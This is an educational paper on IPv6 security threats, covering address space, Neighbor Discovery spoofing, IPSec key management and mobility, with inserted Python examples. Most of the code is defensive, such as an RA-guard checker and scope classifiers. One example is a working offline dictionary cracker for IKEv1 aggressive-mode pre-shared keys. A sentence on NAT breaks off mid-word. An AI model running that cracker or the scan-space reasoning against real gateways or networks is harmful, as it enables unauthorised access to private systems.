Chapter: 1 - Abstract
Since the current generation of the Internet Protocol, IP version 4 (IPv4), was introduced in 1980, it has been in use for more than 20 years and has supported the rapid growth of the Internet during that time. IPv4 has proven to be simple, easily implemented and robust. However, the Internet has recently grown much larger than was ever expected, and this unpredictable growth has raised several problems: configuration complexity, poor security at the IP level, the imminent exhaustion of the IPv4 address space, and poor Quality of Service (QoS) support for real-time delivery of data. To address these and other issues, the Internet Engineering Task Force (IETF) has developed a set of protocols and standards known as IP version 6 (IPv6). IPv6 introduces new features such as address autoconfiguration, end-to-end (peer-to-peer) connectivity, and mandatory support for security and mobility. These new features pose a significant security challenge for future networks based on IPv6. This paper examines the security threats related to the new features introduced in IPv6.
Key words: IPv4, IPv6, NAT, TCP/IP, IPSec, IKE, PKI, CGA
Business stakeholders and Internet experts generally agree that IPv6-based networks would be technically far superior to the widely installed IPv4-based networks. The immensely increased address space available under IPv6 could stimulate a wealth of new and innovative communications services. The development of new classes of network applications (for example, widely deployed networked devices for monitoring, control and repair in the home, the office and industry) could result in rapid increases in demand for global IP addresses.
Gradually, IPv6 is becoming (compared to IPv4) a more useful and flexible mechanism for providing user communications on a peer-to-peer basis. The enhanced capabilities and the redesigned header format of IPv6 could also make the configuration and operation of certain networks and network services simpler, which saves operations and management cost for network administrators. The mobility and autoconfiguration features of IPv6 could likewise make it simpler to connect computers to the Internet and ease network access for mobile Internet users. However, the new features also bring new security concerns that need to be addressed, and many groups around the world are studying the security aspects of IPv6. The security threats of IPv6 are discussed in the following sections: the security concerns for the new features of IPv6 are examined, along with the threats inherited from IPv4-based inter-network communication.
The second section outlines the important features of IPv6. The third section discusses these features in detail, together with the security issues they raise and the current work to handle the threats. The fourth section highlights threats that are common to IPv4 and IPv6. Finally, the paper is summarised with the IPv6 features that are required for strengthening network security.
Five Key IPv6 Concepts
Here are five keywords that will aid your understanding should you read the IPv6 RFCs (Requests for Comments): Stateful and Stateless; Link-Local and Site-Local addresses; and ND (Neighbor Discovery).
A stateful IP address is one assigned by a DHCP (Dynamic Host Configuration Protocol) server. DHCP usually supplies more than just the IP address, for example the address of the DNS (Domain Name System) server and the default gateway.
"A stateless IP address is one that is automatically configured by router discovery." Unlike in IPv4, the node assigns itself an IPv6 address automatically, combining the prefix learned from the router with an interface identifier it generates itself.
Link-local IPv6 addresses allow connections only with neighbours on the same link: these addresses start with FE80 (fe80::/10) and are not forwarded by routers.
Site-local addresses are routable within a site but not on the Internet, so nodes with site-local IPv6 addresses, much like nodes with private IPv4 addresses, can connect only to other site-local addresses within the organisation. Site-local addresses start with FEC0 (fec0::/10). (The site-local prefix was later deprecated by RFC 3879 in favour of unique local addresses, fc00::/7, defined in RFC 4193.)
ND (Neighbor Discovery)
ND replaces IPv4's ARP and ICMP Router Discovery mechanisms. Its purpose is to let nodes discover the routers on their link and the link-layer addresses of their neighbours. An IPv6 stack also uses ND to learn which addresses are already in use on the link, so that the address it configures for itself through autoconfiguration is not a duplicate.
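The scopes and multicast groups described in the five concepts above, as an added example that is not part of the paper: the classifier below labels an address by its scope (link-local fe80::/10, site-local fec0::/10, unique local, global, or a multicast group and its scope nibble), and `solicited_node_multicast` derives the ff02::1:ffXX:XXXX group that a Neighbor Solicitation for a given address is sent to, which is why ND does not need broadcast. Only the Python standard library is used; the sample addresses in the comments are constructed.

```python
import ipaddress

# Well-known multicast groups (RFC 4291 section 2.7.1, RFC 2375, RFC 3315).
WELL_KNOWN_MULTICAST = {
    "ff02::1": "all nodes on the link",
    "ff02::2": "all routers on the link",
    "ff05::2": "all routers in the site",
    "ff05::1:3": "all DHCPv6 servers in the site",
}

# Multicast scope is the low nibble of the second address byte (RFC 4291 section 2.7).
MULTICAST_SCOPES = {
    0x1: "interface-local", 0x2: "link-local", 0x4: "admin-local",
    0x5: "site-local", 0x8: "organization-local", 0xE: "global",
}


def classify(addr_text: str) -> str:
    """Describe the scope of an IPv6 address, e.g. 'fe80::1' or 'ff05::1:3' (constructed samples)."""
    a = ipaddress.IPv6Address(addr_text)
    if a.is_multicast:
        scope = MULTICAST_SCOPES.get(a.packed[1] & 0x0F, "reserved/unassigned")
        group = WELL_KNOWN_MULTICAST.get(str(a))
        return f"multicast, {scope} scope" + (f": {group}" if group else "")
    if a.is_link_local:   # fe80::/10
        return "link-local unicast (fe80::/10): valid on one link, never forwarded by routers"
    if a.is_site_local:   # fec0::/10
        return "site-local unicast (fec0::/10): routable inside the site only (deprecated by RFC 3879)"
    if a in ipaddress.IPv6Network("fc00::/7"):
        return "unique local unicast (fc00::/7): the RFC 4193 replacement for site-local"
    if a in ipaddress.IPv6Network("2000::/3"):
        return "global unicast (2000::/3): routable on the Internet"
    return "other (loopback, unspecified, transition or reserved)"


def solicited_node_multicast(addr_text: str) -> str:
    """The ff02::1:ffXX:XXXX group (RFC 4291 section 2.7.1) that a Neighbor Solicitation
    for addr_text is multicast to. Only nodes whose address shares the low 24 bits listen
    on it, so address resolution does not wake every host on the link."""
    low24 = ipaddress.IPv6Address(addr_text).packed[13:]
    return str(ipaddress.IPv6Address(b"\xff\x02" + b"\x00" * 9 + b"\x01\xff" + low24))


if __name__ == "__main__":
    for sample in ("fe80::1", "fec0::1", "fd00::1", "ff02::1", "ff05::1:3"):
        print(sample, "->", classify(sample))
    print("NS target group for 2001:db8::21b:21ff:feaa:bbcc:",
          solicited_node_multicast("2001:db8::21b:21ff:feaa:bbcc"))
```

The explicit prefix tests for fc00::/7 and 2000::/3 are deliberate: Python's `is_global`/`is_private` properties also treat documentation and other reserved ranges specially, which is not what a scope classification wants.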
Important Features of IPv6
The addressing problem of IPv4 was the prime motivation for creating a newer version of IP (IPv6). However, along with this change the Internet Protocol has been updated in many other respects as well to extend its capability. Some of the important features of IPv6 are highlighted below:
Bigger Address Space
IPv6 has 16-byte (128-bit) source and destination addresses, compared to 4 bytes (32 bits) in IPv4. IPv6 therefore provides about 3.4 × 10^38 addresses, compared to about 4.3 × 10^9 in IPv4. The enlarged address space could make over 10^27 unique addresses available to every individual on earth in the year 2050.
Effective Management of Address Space
IPv6 was expected not only to provide more addresses, but also to support efficient and fast routing in today's networks and flexibility for future networks, with a more efficient way of distributing the address space and better support for multicast (IPv6 has no broadcast; the all-nodes multicast group takes its place).
Better Support for Security
IPv4 was designed at a time when security was not a prime concern. Today, security on the public Internet is a major concern, and the future success of the public network depends on resolving it. IPSec support is a mandatory feature of IPv6.
Easy TCP/IP Administration
The designers of IPv6 were expected to resolve the difficulties of configuring IP addresses in version 4. Although tools like DHCP (Dynamic Host Configuration Protocol) eliminate the need to configure hosts manually, they only partially solve the problem. The Neighbor Discovery protocol allows an IPv6 node to perform stateless address autoconfiguration.
Better Support for Mobility
When IPv4 was designed there was no concept of mobile IP devices. The problems associated with computers (notably notebooks) that travel between different networks led to the need for Mobile IP. IPv6 builds on Mobile IP and provides mobility support within IP itself.
Elimination of "Addressing Kludges"
Technologies like NAT (Network Address Translation) are effectively "kludges" that compensate for the lack of address space in IPv4. IPv6 eliminates the need for NAT and similar work-arounds, allowing every TCP/IP device to have a public address.
Security issues relating to features of IPv6
Along with better network security, there are many expectations of the features of the IPv6 protocol. IPv6 provides security at the network level through IPSec. Although this is an obvious improvement in security, its universal usability is questionable. Moreover, the other features described above also bring new security threats. The sections below discuss those features and the security issues arising from them in detail.
Larger Address Space
In 1980, when the IPv4 address space was designed, its designers never expected that it could be exhausted. However, because of changes in technology and allocation practices that did not anticipate the explosion in the number of hosts on the Internet, by 1992 it was clear that a replacement for the current version of IP would be needed. The 16-byte (128-bit) address will solve the address space problem for at least 50 years into the future, even at the present rate of Internet growth.
The first category of security attack related to addresses is reconnaissance, in which the attacker attempts to learn as much as possible about the victim's network. Reconnaissance is carried out with techniques called "ping sweeps" and "port scans". In IPv4 this is comparatively easy because a subnet holds only hundreds or thousands of addresses. In IPv6 the task becomes very difficult because the number of addresses in a subnet over which a port scan would have to be carried out is of the order of 2^64. For example, at a scanning rate of one million addresses per second, it would take the attacker more than 500 thousand years to scan a whole subnet. The bigger address space is therefore an obstacle to reconnaissance. It can make a malicious client's work tough, but it may equally obstruct countermeasures such as security scanners and IDS.
Better Address Space Management
The much bigger IPv6 address is designed to be subdivided into hierarchical routing domains that reflect the topology of the modern Internet. The use of 128 bits for addressing allows multiple levels of hierarchy and flexibility in designing hierarchical addressing and routing, which the IPv4-based Internet lacks. An IPv6 host or router can have more than one unicast and multicast address. When the use of these address ranges is combined with the routing system, the network designer can limit access to IPv6 peer nodes through addressing and routing alone. For instance, the designer can assign global unicast addresses only to nodes that need to communicate with the global Internet, and site-local (local-scope) addresses to nodes that need to communicate only within the organisation's network. Similarly, if a node needs to communicate only within a particular subnet, a link-local address suffices. Moreover, the IPv6 privacy extensions (RFC 4941) reduce the chance of any single IPv6 address being exposed to a security threat.
IPv6 also supports new multicast addresses that can enable an attacker to identify key resources on a network and then attack them. These multicast addresses have a node-, link- or site-specific scope, defined in RFC 2375. For example, the all-routers (FF05::2) and all-DHCP-servers (FF05::1:3) addresses have site scope. Although this has a clearly legitimate use, in effect it hands the attacker a ready-made list of systems to attack further, whether with simple SYN flooding or with something more sophisticated designed to compromise the device.
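The reconnaissance figure above (2^64 addresses per subnet) holds only if interface identifiers are unpredictable, which is the caveat behind the paper's remark on privacy extensions. As an added example that is not part of the paper, the code below derives the modified EUI-64 identifier that stateless autoconfiguration builds from a MAC address (RFC 4291 Appendix A), reverses it to recover the MAC and vendor OUI, generates an RFC 4941-style random identifier instead, and compares the search space a scanner faces in each case at the paper's rate of one million probes per second. The MAC and prefix are constructed sample values; the 2^24 figure assumes the attacker already knows the vendor OUI of the target hardware (the reasoning RFC 7707 documents).

```python
import ipaddress
import os

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def eui64_interface_id(mac: bytes) -> bytes:
    """Modified EUI-64 interface identifier (RFC 4291 Appendix A): ff:fe is inserted in the
    middle of the 48-bit MAC and the universal/local bit (0x02 of the first byte) is inverted."""
    if len(mac) != 6:
        raise ValueError("MAC address must be 6 bytes")
    return bytes([mac[0] ^ 0x02]) + mac[1:3] + b"\xff\xfe" + mac[3:6]


def mac_from_eui64(addr_text: str) -> bytes:
    """Reverse the transformation: the MAC, and so the vendor OUI, is readable from the address."""
    iid = ipaddress.IPv6Address(addr_text).packed[8:]
    if iid[3:5] != b"\xff\xfe":
        raise ValueError("interface identifier is not a modified EUI-64")
    return bytes([iid[0] ^ 0x02]) + iid[1:3] + iid[5:8]


def random_interface_id() -> bytes:
    """Temporary identifier in the spirit of RFC 4941 privacy extensions: 64 random bits with
    the universal/local bit cleared, so nothing about the hardware is disclosed."""
    iid = bytearray(os.urandom(8))
    iid[0] &= 0xFD
    return bytes(iid)


def slaac_address(prefix_text: str, interface_id: bytes) -> str:
    """Stateless autoconfiguration: the /64 prefix from the Router Advertisement plus the identifier."""
    net = ipaddress.IPv6Network(prefix_text)
    if net.prefixlen != 64 or len(interface_id) != 8:
        raise ValueError("SLAAC needs a /64 prefix and a 64-bit interface identifier")
    return str(ipaddress.IPv6Address(net.network_address.packed[:8] + interface_id))


def candidate_interface_ids(eui64_in_use: bool, oui_known: bool) -> int:
    """How many interface identifiers a scanner must try inside one /64."""
    if eui64_in_use and oui_known:
        return 2 ** 24    # only the low 24 bits of the MAC are unknown (assumption: OUI known)
    if eui64_in_use:
        return 2 ** 48    # any MAC; in practice far fewer OUIs are actually assigned
    return 2 ** 64        # random identifiers: the full space the paper quotes


def scan_years(candidates: int, probes_per_second: float) -> float:
    return candidates / probes_per_second / SECONDS_PER_YEAR


if __name__ == "__main__":
    mac = bytes.fromhex("001b21aabbcc")          # constructed sample MAC
    predictable = slaac_address("2001:db8::/64", eui64_interface_id(mac))
    private = slaac_address("2001:db8::/64", random_interface_id())
    print("EUI-64 address:", predictable, "-> MAC", mac_from_eui64(predictable).hex(":"))
    print("privacy address:", private)
    for label, n in (("random IIDs", candidate_interface_ids(False, False)),
                     ("EUI-64, OUI known", candidate_interface_ids(True, True))):
        print(f"{label}: {scan_years(n, 1e6):.2e} years at 1M probes/s")
```

With EUI-64 identifiers and a known OUI the whole /64 collapses to about 17 seconds of scanning, which is why privacy extensions (or DHCPv6 with non-sequential assignment) matter for the address-space argument to hold.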
Eliminating NAT (Network Address Translation)
When IPv4 addresses were allocated worldwide, they were handed out in such a way that North America had plenty while Europe and Asia had far fewer. When the address shortage was recognised, a work-around called Network Address Translation (NAT) was designed: NAT gateways rewrite the addresses in packets and can thus hide a whole network behind a single official IP address. As NAT promotes the reuse of private address space, it does not support the standards-
NAT breaks peer-to-peer connectivity, so it has obvious drawbacks, as shown in figure 1.
IPv6 does not support NAT by design. With its 128-bit address space, IPv6 can offer peer-to-peer (end-to-end) connectivity to all hosts on the network. Although this feature is a boon, it is also a bane from the security point of view. Current networks use NAT, which provides a single entry point to the network where security mechanisms like firewalls can be set up, as described in fig. 1. A firewall protects a not-so-secure point inside a network from the rest of the outside world. At the network perimeter the firewall enforces a uniform policy: it stops outsiders from performing dangerous actions and provides a scalable checkpoint under centralised control. Peer-to-peer connectivity, encryption and tunnelling may conflict with this policy, and traffic that the firewall cannot inspect can bring unpleasant consequences to the network nodes. With peer-to-peer connectivity there is no such security at the entry point, and the security measures lie only with the nodes, not all of which have the computing resources needed to provide security. Note that the chokepoint itself does not depend on NAT: a stateful IPv6 firewall at the site border can enforce the same default-deny policy on globally routable addresses (RFC 4864 discusses this in detail).
Easy TCP/IP Administration
With IPv6, the Address Resolution Protocol (ARP) is gone; stateless autoconfiguration and Neighbor Discovery are built on ICMPv6 (Internet Control Message Protocol version 6). IPv6 Neighbor Discovery (ND) gives IPv6 hosts a means to discover the presence and link-layer addresses of other hosts on the local link. It also provides methods for discovering the routers available on the local link, for detecting when a neighbour becomes unreachable, for detecting duplicate addresses, and for routers to inform hosts when another router is a better first hop (redirection).
Neighbor Discovery starts with a multicast Neighbor Solicitation (NS) query. Anyone on the link can respond to that query with a Neighbor Advertisement (NA), as shown in fig. 2. A malicious node can therefore send forged Neighbor Advertisements and cause Neighbor Discovery to fail. ND can be attacked in many ways by forging ND packets: forged packets can interfere with ND and make certain hosts on the network unreachable; a fake response to DAD (Duplicate Address Detection) makes DAD fail, and with it address autoconfiguration; and spoofed Router Advertisements can divert traffic to the adversary for man-in-the-middle attacks, or to another host, resulting in denial of service (DoS) by flooding.
Autoconfiguration allows any malicious host to obtain an IPv6 address without authentication or administrative configuration, so any system with physical access to the network gets IPv6 access. The security implications can be serious, because merely being on the LAN sometimes implies certain access rights, for example access to specific proprietary applications.
The original Neighbor Discovery Protocol (NDP) specification called for the use of IPSec to protect NDP messages. However, the RFCs do not describe in detail how IPSec should be used for this, and there is no simple architecture for determining which neighbouring hosts are authorised to respond. Given how Neighbor Discovery operates, these attacks can only be performed by hosts on the same link or network segment, which limits their impact. Operators of networks where hosts are not trusted should apply some kind of protection against these attacks. Mechanisms such as Secure Neighbor Discovery (SEND, RFC 3971), which builds on Cryptographically Generated Addresses (CGA, RFC 3972), now describe how to counter the threats to Neighbor Discovery.
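The spoofed Router Advertisement case from the section above, as an added example that is not part of the paper: the code parses an ICMPv6 Router Advertisement (RFC 4861 section 4.2) from raw bytes, verifies the ICMPv6 checksum over the IPv6 pseudo-header (RFC 4443 section 2.3), and applies a small RA-guard style policy (the idea of RFC 6105): RAs must come from a link-local source, from a known router, and may only announce expected prefixes, while a lifetime-0 RA from a trusted router (which removes that default route on every host) is flagged for review. `build_ra` only exists to construct the sample packets; the router addresses, MACs and prefixes are constructed, and a real deployment would feed the parser from a packet capture or a switch's RA-guard log instead.

```python
import ipaddress
import struct
from dataclasses import dataclass, field
from typing import List, Optional

ICMPV6_NEXT_HEADER = 58
ROUTER_ADVERTISEMENT = 134
OPT_SOURCE_LLADDR = 1
OPT_PREFIX_INFO = 3


def icmpv6_checksum(src: bytes, dst: bytes, message: bytes) -> int:
    """RFC 4443 section 2.3: one's-complement sum over the IPv6 pseudo-header
    (src, dst, upper-layer length, zeros, next header = 58) plus the ICMPv6 message."""
    pseudo = src + dst + struct.pack("!I3xB", len(message), ICMPV6_NEXT_HEADER)
    data = pseudo + message
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ra(src: str, dst: str, router_lifetime: int, prefix: str, lladdr: bytes) -> bytes:
    """Construct an RA with a source link-layer option and one prefix option (sample input only)."""
    net = ipaddress.IPv6Network(prefix)
    msg = struct.pack("!BBHBBHII", ROUTER_ADVERTISEMENT, 0, 0, 64, 0, router_lifetime, 0, 0)
    msg += struct.pack("!BB6s", OPT_SOURCE_LLADDR, 1, lladdr)
    msg += struct.pack("!BBBBIII16s", OPT_PREFIX_INFO, 4, net.prefixlen, 0xC0,   # L and A flags
                       2592000, 604800, 0, net.network_address.packed)
    s, d = ipaddress.IPv6Address(src).packed, ipaddress.IPv6Address(dst).packed
    return msg[:2] + struct.pack("!H", icmpv6_checksum(s, d, msg)) + msg[4:]


@dataclass
class RouterAdvertisement:
    src: ipaddress.IPv6Address
    router_lifetime: int
    lladdr: Optional[bytes] = None
    prefixes: List[ipaddress.IPv6Network] = field(default_factory=list)


def parse_ra(src: str, dst: str, message: bytes) -> RouterAdvertisement:
    """Parse the ICMPv6 payload of a Router Advertisement; raises ValueError on anything malformed."""
    s, d = ipaddress.IPv6Address(src), ipaddress.IPv6Address(dst)
    if len(message) < 16 or message[0] != ROUTER_ADVERTISEMENT or message[1] != 0:
        raise ValueError("not a Router Advertisement")
    if icmpv6_checksum(s.packed, d.packed, message) != 0:   # a valid packet sums to zero
        raise ValueError("bad ICMPv6 checksum")
    ra = RouterAdvertisement(src=s, router_lifetime=struct.unpack("!H", message[6:8])[0])
    off = 16
    while off + 2 <= len(message):
        otype, olen = message[off], message[off + 1] * 8
        if olen == 0 or off + olen > len(message):
            raise ValueError("malformed ND option")         # RFC 4861 7.1.2: discard the packet
        if otype == OPT_SOURCE_LLADDR:
            ra.lladdr = message[off + 2:off + 8]
        elif otype == OPT_PREFIX_INFO and olen == 32:
            plen = message[off + 2]
            pfx = int.from_bytes(message[off + 16:off + 32], "big")
            ra.prefixes.append(ipaddress.IPv6Network((pfx, plen), strict=False))
        off += olen
    return ra


def ra_is_valid(src: str, dst: str, message: bytes) -> bool:
    try:
        parse_ra(src, dst, message)
        return True
    except ValueError:
        return False


def check_ra(ra: RouterAdvertisement, trusted_routers, expected_prefixes) -> List[str]:
    """RA-guard style policy: returns the list of findings (empty means the RA is acceptable)."""
    trusted = {ipaddress.IPv6Address(t) for t in trusted_routers}
    expected = {ipaddress.IPv6Network(p) for p in expected_prefixes}
    findings = []
    if not ra.src.is_link_local:
        findings.append(f"source {ra.src} is not link-local, which RFC 4861 requires for an RA")
    if ra.src not in trusted:
        findings.append(f"RA from unknown router {ra.src}: possible rogue router / man-in-the-middle")
    elif ra.router_lifetime == 0:
        findings.append(f"trusted router {ra.src} announces lifetime 0: legitimate shutdown, "
                        "or a spoofed RA removing the default route from every host")
    for p in ra.prefixes:
        if p not in expected:
            findings.append(f"unexpected prefix {p}: hosts would autoconfigure addresses in it")
    return findings


if __name__ == "__main__":
    policy = ({"fe80::1"}, {"2001:db8:1::/64"})
    legit = build_ra("fe80::1", "ff02::1", 1800, "2001:db8:1::/64", bytes.fromhex("001b21000001"))
    rogue = build_ra("fe80::bad", "ff02::1", 1800, "2001:db8:dead::/64", bytes.fromhex("001b21bad001"))
    for name, src, pkt in (("legitimate", "fe80::1", legit), ("rogue", "fe80::bad", rogue)):
        print(name, check_ra(parse_ra(src, "ff02::1", pkt), *policy) or "OK")
```

The same pattern (parse, verify the checksum, compare the source and the advertised data against what the operator knows) applies to Neighbor Advertisements; there the field to watch is a target link-layer address that differs from the one previously learned for that IPv6 address.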
Better Support for Security
IPSec is mandatory in IPv6 (the IPv6 Node Requirements, RFC 4294, made it a MUST; the 2011 revision, RFC 6434, relaxed this to a SHOULD) and is definitely a security improvement. IPSec provides IP-level authentication of packets and encryption of individual packets or traffic flows; encryption algorithms are plugged into the IPSec framework. Current IPSec implementations are better suited to tunnelling (as in a Virtual Private Network) than to arbitrary peer-to-peer communication. The reason is the problem of encryption key management. Traffic protection with AH or ESP is not practical without a key management mechanism; manual key distribution does not scale, so an automated system, IKE, is needed. IKE has the limitation that it is, at present, a unicast UDP (User Datagram Protocol) protocol, so it is of no use for multicast and anycast addresses.
We note that the IPv6 RFCs do in fact say to use IPSec AH to protect ICMPv6. The question is "how?" To use IPSec, each pair of nodes needs a Security Association, which depends on the addresses learned through ND (Neighbor Discovery), on keys, on a lifetime, and so on. If Security Associations must already be established, how many are needed? These questions can be phrased as: "If one already has IPSec set up, why is discovery needed?" or "How can a Security Association already exist with a node one has not yet discovered?"
Better Mobility Support
The mobility feature of IPv6 allows a mobile host to keep the same IP address even when it moves from its home network to a foreign network. This feature is built into IPv6.
Mobility is a complex function of IPv6 involving many entities (mobile nodes, home agents, etc.). Even the normal operation of mobility raises several security questions, such as the authentication and authorisation of the mobile node in a foreign network. Because mobility uses option headers (the Home Address destination option and the type 2 routing header of RFC 3775) to carry the "real" home address of a mobile node while the care-of address is used in the IPv6 header, it can be drawn into address-spoofing attacks: by supplying false binding information to the home agent, legitimate traffic can be diverted.
IPSec sets up a secure channel between two end points. It is hard for a firewall between the networks to do its job if it does not understand the application or cannot parse the payload.
IPv6 provides the basic technology to prevent attacks like sniffing through IPSec, but until the key management issues are resolved, deployment of IPSec will be held up and sniffing will remain possible on networks.
Man-in-the-middle attack
As with IPv4, IPv6 is exposed to the same man-in-the-middle risks within the IPSec protocol suite, more specifically in IKE. There are tools that can attack an IKE aggressive mode negotiation and derive the pre-shared key.
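The weakness those tools exploit, as an added example that is not part of the paper: in IKEv1 aggressive mode with pre-shared-key authentication, the responder sends HASH_R (RFC 2409, section 5.4) in the clear, and every input to it except the pre-shared key itself is visible on the wire, so a passive observer can test candidate keys offline without ever talking to the gateway. The code computes SKEYID and HASH_R exactly as the RFC defines them and runs a dictionary attack against an observed hash. The exchange values are constructed stand-ins, not a capture, and HMAC-SHA1 is assumed as the negotiated prf.

```python
import hashlib
import hmac
from typing import Iterable, Optional


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """RFC 2409 section 5.4, pre-shared key authentication:
    SKEYID = prf(pre-shared-key, Ni_b | Nr_b). HMAC-SHA1 is assumed as the negotiated prf."""
    return hmac.new(psk, ni_b + nr_b, hashlib.sha1).digest()


def hash_r(psk: bytes, x: dict) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b).
    In aggressive mode this value travels unencrypted in the responder's first message."""
    data = x["g_xr"] + x["g_xi"] + x["cky_r"] + x["cky_i"] + x["sai_b"] + x["idir_b"]
    return hmac.new(skeyid_psk(psk, x["ni_b"], x["nr_b"]), data, hashlib.sha1).digest()


def crack_psk(observed_hash_r: bytes, exchange: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute HASH_R for each candidate key and compare."""
    for candidate in wordlist:
        if hmac.compare_digest(hash_r(candidate.encode(), exchange), observed_hash_r):
            return candidate
    return None


# Constructed stand-ins for the fields an observer records from one aggressive-mode exchange
# (KE, Nonce, SA and ID payloads plus the cookies from the ISAKMP header). Not captured data.
SAMPLE_EXCHANGE = {
    "g_xi": bytes(range(128)),                     # initiator Diffie-Hellman public value
    "g_xr": bytes(range(255, 127, -1)),            # responder Diffie-Hellman public value
    "cky_i": bytes.fromhex("0102030405060708"),    # initiator cookie
    "cky_r": bytes.fromhex("1112131415161718"),    # responder cookie
    "sai_b": bytes.fromhex("00000001000000010000002801010001000000200101000080010005"
                           "800200028003000180040002"),   # placeholder SA payload body
    "idir_b": bytes.fromhex("02000000") + b"vpn.example.com",  # ID_FQDN (type 2) + identity
    "ni_b": bytes.fromhex("a0" * 20),              # initiator nonce
    "nr_b": bytes.fromhex("b1" * 20),              # responder nonce
}


if __name__ == "__main__":
    observed = hash_r(b"letmein", SAMPLE_EXCHANGE)   # what the sniffer would have recorded
    print("recovered PSK:", crack_psk(observed, SAMPLE_EXCHANGE, ["password", "letmein", "admin"]))
```

Main mode keeps the equivalent hash inside the encrypted exchange, and IKEv2 encrypts its AUTH payload, so neither gives a passive observer something to test guesses against; where aggressive mode with pre-shared keys cannot be avoided, the key has to carry enough entropy to make the dictionary useless.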
Application layer attacks
Both IPv4 and IPv6 are susceptible to attacks at the application layer. If peer-to-peer traffic is secured with IPSec, firewalls and IDS tools cannot provide protection when they encounter encrypted traffic; all security protection then becomes the responsibility of the hosts.
An IPv6 network is as vulnerable to DoS attacks as an IPv4 network. Although the increased scope for spoofed IP addresses may make flooding attacks harder to trace, the core principles of a flooding attack remain the same in IPv6 and IPv4.
The attacker could be a malicious wireless access point, router, DHCP or DNS server, or switch. These attacks are fairly common in IPv4 networks and are not significantly changed in IPv6. If IPSec were used more widely in IPv6, node authentication could mitigate them.
To conclude, IPv6 has several new features that increase network security. IPv6 does not provide fundamentally new security measures, but there are small enhancements that, if used properly, can change network security for the better. As IPv6 is still young, it is too early to tell whether IPv6 itself will enhance IP security. The IETF (Internet Engineering Task Force) is still working on IPv6 security issues such as ICMPv6, IPv6 firewalls, mobility, transition, etc. In the long term we can expect IPv6 to have conceptually better security than IPv4 has had since 1980.
- Differences Between IPv4 and IPv6 Addresses. (n.d.). Retrieved May 12, 2010, from http://www.computerperformance.co.uk/Longhorn/ipv6.htm
- Zagar, D. (2006). IPv6 Security Threats and Possible Solutions.